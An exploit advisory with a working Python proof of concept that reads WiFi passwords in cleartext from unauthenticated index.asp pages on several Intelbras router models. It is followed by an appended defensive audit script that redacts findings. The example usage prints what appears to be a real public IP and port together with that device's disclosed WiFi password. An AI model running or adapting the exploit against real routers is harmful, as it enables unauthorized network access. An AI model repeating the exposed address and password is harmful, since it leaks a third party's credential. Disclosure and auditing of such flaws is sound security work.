Title: Intelbras Roteadores – Remote WiFi Password Disclosure
Date: 2020-02-09
Author: Nir Yehoshua 
Vendor Homepage: http://intelbras.com.br/
Vulnerable Routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim.


Details:

The following routers from Intelbras (a Brazilian company) store the WiFi password in cleartext, without any encryption or hashing: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim.
An attacker can send an HTTP request to the router and read the password from the response.


####################

Python code:


import requests

print('Remote WiFi Password disclosure, Please enter the victim address: (Use http / https://<IP>:PORT/index.asp)')
user_input = input("> ")
checker = requests.get(user_input, timeout=10)  # Plain GET of index.asp; no credentials are sent

if 'def_wirelesspassword' in checker.text: # The password variable
    print("Vulnerable")
    # Take the rest of the line after the variable name and strip the '= "' prefix and '";' suffix
    details = checker.text.split("def_wirelesspassword")[1].split('\n')[0].replace('= "','').replace('";','') # Quick and dirty split method
    print('wifi password is:', details)
else:
    print("Not Vulnerable")
    exit()

Example usage:
Remote WiFi Password disclosure, Please enter the victim address: (Use http / Https://<IP>:PORT/index.asp)
> http://77.70.110.152:8080/index.asp
Vulnerable
wifi password is:  0896676565

####################

List of vulnerable devices:

And more than 1,500 over the globe.
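
A defensive check for the exposure described above, as an added example that is not part of the original advisory: it audits a saved HTTP response body from a device you administer for cleartext credential assignments and reports them with the value redacted. Only the variable name def_wirelesspassword comes from the advisory; the other keywords, the other variable names and the sample body are constructed assumptions, and the matching is more general than the single variable the advisory names.

```python
import re

# Matches JavaScript-style assignments such as: def_wirelesspassword = "value";
# Only "def_wirelesspassword" is from the advisory; the other keywords
# (passwd, psk, wpakey) are assumptions added for illustration.
ASSIGNMENT = re.compile(
    r'''\b(?P<name>\w*(?:password|passwd|psk|wpakey)\w*)\s*=\s*(?P<q>["'])(?P<value>.*?)(?P=q)''',
    re.IGNORECASE,
)


def redact(value):
    """Keep only the length so audit reports never contain the secret."""
    return "<redacted, %d chars>" % len(value)


def audit_body(body):
    """Return (line_number, variable, redacted_value) for every non-empty
    cleartext credential assignment found in an HTTP response body."""
    findings = []
    for lineno, line in enumerate(body.splitlines(), start=1):
        for m in ASSIGNMENT.finditer(line):
            if m.group("value"):  # an empty string leaks nothing
                findings.append(
                    (lineno, m.group("name"), redact(m.group("value")))
                )
    return findings


# Constructed sample of a router page (not captured from a real device).
SAMPLE_BODY = '''<html><script>
var def_wirelessssid = "HomeNet";
var def_wirelesspassword = "example-passphrase";
var def_adminpassword = "";
</script></html>'''

if __name__ == "__main__":
    for lineno, name, value in audit_body(SAMPLE_BODY):
        print("line %d: %s exposes a cleartext value %s" % (lineno, name, value))
```

Any finding on a page that is served without authentication means the credential should be rotated once the device is patched or moved behind an access control.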